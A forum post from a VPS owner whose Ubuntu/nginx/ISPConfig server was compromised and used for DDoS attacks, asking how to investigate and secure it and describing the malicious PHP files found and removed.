I got an email from my hosting provider telling me that my VPS was used to perform DDOS attacks on this website: cpanel4.vhosting-it.com. Unfortunately I haven't read their email sooner, so they suspended my account.
Here's the log that they receive from the attacked website.
Before reactivating my VPS, I want to know how can I find the shell script used to perform the attack and how the attacker gained access to my VPS? how can I protect my VPS after reactivating it?
I'm using Ubuntu 18.04 + nginx + ISPConfig.
Edit1:
My hosting provider is waiting for my report explaining the issue and the measures I made to prevent similar incidents in the future.
Edit2: ok, so after regaining access to my vps, I've found this: 1- nginx can't start it give me some error after checking the journalctl I found that ispconfig was down after a php file was uploaded to upload folder 2- after login to my server through ftp I found that hundreds of php files and folders were created!!! in principal it's another php file but renamed and with small modifications in some variables. 3- the index.php file was also modified 4- kaspersky mark those php files as viruses (Trojan.PHP.Agent.uo)
So What I did, is: 1- removed all those php files 2- installed wordfence and made a scan then repaired all repairable files and deleted others. 3- I'll backup my DB and some critical files then reinstall my vps.